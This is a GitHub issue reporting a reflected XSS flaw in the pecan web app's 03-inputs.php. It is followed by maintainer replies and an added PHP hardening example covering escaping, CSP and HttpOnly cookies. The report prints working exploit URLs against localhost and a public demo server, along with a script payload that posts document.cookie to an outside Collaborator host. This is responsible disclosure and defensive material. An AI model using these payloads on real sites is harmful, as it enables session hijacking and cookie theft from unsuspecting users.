Reflected XSS on 03-inputs.php file · Issue #3400 · PecanProject/pecan · GitHub

Reflected XSS on 03-inputs.php file #3400

Open
TwistedKnee opened this issue Dec 15, 2024 · 3 comments

Comments

@TwistedKnee
TwistedKnee commented Dec 15, 2024

Bug Description

An unauthenticated user can access the 03-inputs.php and execute a reflected XSS on the site with the payload:
"3cck"><script>alert(1)<%2fscript>zqqf2jvbenj" in the URL parameters: hostname, sitegroupid, lat, lon, and sitename.

To Reproduce

I am hosting on a fresh install through docker. To repeat the steps, go to your pecan.localhost server and paste this path:

http://pecan.localhost/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=99000000003&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ezqqf2jvbenj

I was also able to exploit this on your demo at:

http://pecan.ncsa.illinois.edu/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=5000000259&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ezqqf2jvbenj

Further description

The vulnerability occurs when unsanitized input from the user is reflected back on the page without proper validation or escaping. This allows an attacker to inject malicious JavaScript code into the application, which will be executed in the context of the victim's browser.

Screenshots

[screenshot: XSS execution at pecan.ncsa.illinois.edu]

[screenshot: XSS execution on localhost]

[screenshot: source code of the site with injected values]

In addition to executing JavaScript, I can also craft the XSS to steal a user's cookie and their session. If I send a payload like so:

http://pecan.localhost/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=99000000003&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3e%3cscript%3efetch(%27https%3a%2f%2f4v0ed43gg2vq3ckagbmyfdbpigo7cy0n.oastify.com%27%2c%20%7bmethod%3a%20%27POST%27%2cmode%3a%20%27no-cors%27%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3ezqqf2jvbenj

My payload is this in the sitename parameter:

<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

When I poll my Collaborator in Burp Suite, I get the user's cookie information returned to me.
[screenshot: Burp Collaborator interaction showing the posted cookie]

Mitigation:
HttpOnly Flag for Cookies: Ensure sensitive cookies (e.g., session IDs) are marked as HttpOnly so they cannot be accessed via JavaScript.

Content Security Policy (CSP): A properly configured CSP can help mitigate the risk of XSS attacks by restricting where scripts can be loaded from.

Input Sanitization & Output Encoding: Always sanitize user input and properly encode output to prevent malicious JavaScript from being executed in the browser.

In addition to above you can review more about XSS here: https://portswigger.net/web-security/cross-site-scripting/reflected
In addition, guidance for fixing them here: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

@Sweetdevil144
Contributor

@robkooper

@TwistedKnee
Author

Hello @Sweetdevil144 @robkooper I wanted to double check on this as we are close to 90 days and I would like to work with you guys on this finding. Let me know if you need any more information from my side!

@robkooper
Member

Looking quickly, the problem is at https://github.com/PecanProject/pecan/blob/develop/web/common.php#L53 and we need to add some sanitizing code here.
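The report lists output encoding, HttpOnly cookies and a CSP as the fixes, and the maintainer points at the place in web/common.php where query-string values are echoed back. Below is an added example of what that hardening looks like in a PHP page that reflects the same parameters (hostname, sitegroupid, lat, lon, sitename). It is illustrative code written for this page, not pecan's own common.php or a proposed patch: the helper names `h()`, `query_param()` and `security_headers()`, the form layout, and the exact CSP directives are assumptions chosen for the example.

```php
<?php
// Added example (not pecan's own code): hardening pattern for a PHP page that
// reflects query-string values such as hostname, sitegroupid, lat, lon, sitename.
// Function names and the form markup are illustrative assumptions.

declare(strict_types=1);

/**
 * Escape a value for insertion into HTML text or a double-quoted attribute.
 * ENT_QUOTES escapes both ' and ", which closes the attribute break-out used
 * in the report ("><script>...), so the payload renders as literal text.
 */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Read a query parameter with a shape constraint. Values that do not match
 * the expected type fall back to the default instead of being reflected.
 * Free-text values ('text') are accepted as-is but must still go through h().
 */
function query_param(string $name, string $kind, string $default = ''): string
{
    $raw = $_GET[$name] ?? $default;
    if (!is_string($raw)) {           // arrays (?name[]=x) are never valid here
        return $default;
    }
    switch ($kind) {
        case 'int':
            return preg_match('/^\d{1,18}$/', $raw) ? $raw : $default;
        case 'float':
            return ($raw === '' || is_numeric($raw)) ? $raw : $default;
        case 'hostname':
            return preg_match('/^[A-Za-z0-9.\-]{1,253}$/', $raw) ? $raw : $default;
        default:
            return $raw;
    }
}

/**
 * Defence in depth: even if some other page still reflects input unescaped,
 * an HttpOnly session cookie cannot be read by document.cookie, and a CSP
 * without 'unsafe-inline' makes the browser refuse an injected <script> block.
 * The 'self' sources assume all legitimate scripts are served from this origin.
 */
function security_headers(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; "
         . "object-src 'none'; base-uri 'self'; frame-ancestors 'none'");
    header('X-Content-Type-Options: nosniff');
}

security_headers();   // must run before session_start() and before any output
session_start();

$hostname    = query_param('hostname', 'hostname', 'localhost');
$sitegroupid = query_param('sitegroupid', 'int', '1');
$lat         = query_param('lat', 'float');
$lon         = query_param('lon', 'float');
$sitename    = query_param('sitename', 'text');

header('Content-Type: text/html; charset=UTF-8');
?>
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><title>Inputs</title></head>
<body>
<form method="get" action="03-inputs.php">
  <!-- every reflected value passes through h(), in attributes and in text alike -->
  <input type="hidden" name="hostname" value="<?= h($hostname) ?>">
  <input type="hidden" name="sitegroupid" value="<?= h($sitegroupid) ?>">
  <input type="hidden" name="lat" value="<?= h($lat) ?>">
  <input type="hidden" name="lon" value="<?= h($lon) ?>">
  <label>Site name: <input type="text" name="sitename" value="<?= h($sitename) ?>"></label>
  <button type="submit">Continue</button>
</form>
<p>Selected site: <?= h($sitename) ?></p>
</body>
</html>
```

The order matters: escaping belongs at the point of output (inside the attribute or text node), not at the point of input, because the same value may later be written into SQL, a shell command or JSON where HTML escaping is the wrong encoding. The type checks in `query_param()` simply shrink the surface: numeric ids, coordinates and hostnames have no legitimate reason to contain `"`, `<` or `>`, so rejecting them there catches the report's payload in four of the five parameters before the page is even rendered, while `sitename` is legitimately free text and is protected solely by `h()`. A quick regression check is to request the page with the reporter's URL and confirm that the response body contains `&lt;script&gt;` rather than `<script>`.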
